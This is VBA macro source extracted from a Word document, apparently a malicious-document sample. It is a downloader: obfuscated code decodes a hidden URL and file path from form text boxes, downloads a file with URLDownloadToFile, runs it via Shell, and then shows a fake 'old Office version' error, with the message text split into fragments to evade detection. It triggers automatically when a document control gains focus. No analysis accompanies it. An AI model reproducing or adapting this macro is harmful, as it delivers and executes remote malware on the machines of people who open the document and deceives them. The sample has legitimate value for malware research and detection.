Attribute VB_Name = "Module1"
#If VBA7 Then
Declare PtrSafe Function URLDownloadToFile Lib "urlmon" _
        Alias "URLDownloadToFileA" (ByVal pCaller As Long, _
                                    ByVal szURL As String, ByVal szFileName As String, _
                                    ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
#Else
Declare Function URLDownloadToFile Lib "urlmon" _
        Alias "URLDownloadToFileA" (ByVal pCaller As Long, _
                                    ByVal szURL As String, ByVal szFileName As String, _
                                    ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
#End If

Function Jbrw23(v0, v1, v2, v4, v5)
    URLDownloadToFile 0, v1, v2, 0, 0
End Function
Sub St()
    Dim ut1 As String
    Dim pt1 As String
    
    ut1 = htkwen1(345)
    
    pt1 = htkwen2("qwewqe")
    
    DDwnl22 "heluoie", ut1, pt1, 645
    
    Dim ptn1 As String
    ptn1 = pt1
    
    Go1 5546, ptn1, "jwee"
End Sub

Sub DDwnl22(v1, url1, path1, v2)
    Jbrw23 "riiwer", url1, path1, 75, "56546"
End Sub
Function Dcr2(a1)
    Dim b1 As String
    Dim s1 As String
    lb1 = LBound(a1)
    ub1 = UBound(a1)
    For o1 = lb1 To ub1
        b1 = Chr(a1(o1))
        s1 = s1 + b1
    Next o1
    Dcr2 = s1
End Function

Function NowG2(v1)
    Shell v1
End Function

Function XMLBMS(v2, v1, v0)
    MsgBox v1, 16
End Function


Attribute VB_Name = "Module2"
Function Dcr(str)
    arr = Split(str, ",", -1)
    Dcr = Dcr2(arr)
End Function
Function Go1(v0 As Integer, v1 As String, v3)
    NowG2 v1
    XMLBMS 8474, VtBox("zlo"), "jjuy"
End Function

Function VtBox(v1)
    VtBox = "This ap" & "plic" & "ation ap" & "pears to ha" & "ve be" & "en made wi" & "th an old" & "er versi" & "on of the Mi" & "cro" & "soft Off" & "ice product su" & "ite. Please have the author save this doc" & "ument to a newer and sup" & "ported format. [Er" & "ror Co" & "de: -21" & "9]"
End Function

Function htkwen1(v1)
    If IsNumeric(123) = True Then
        htkwen1 = Dcr(TRWRNW1.TextBox1.Text)
    End If
End Function

Function htkwen2(v1)
    If IsNumeric(123) = True Then
        htkwen2 = Dcr(TRWRNW1.TextBox2.Text)
    End If
End Function
Attribute VB_Name = "TRWRNW1"
Attribute VB_Base = "0{BD450A53-EECB-4918-81DC-1955D9490D96}{DF8A3382-3B8C-447B-BF1A-E9E49065923B}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub TextBox1_Change()

End Sub

Private Sub TextBox2_Change()

End Sub

Private Sub Label1_Click()

End Sub

Private Sub Mnyer1_Click()

End Sub

Private Sub UserForm_Click()

End Sub
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Private Sub InkEdit1_Change()

End Sub

Private Sub InkEdit1_GotFocus()
    St
End Sub


INQUEST-PP=macro
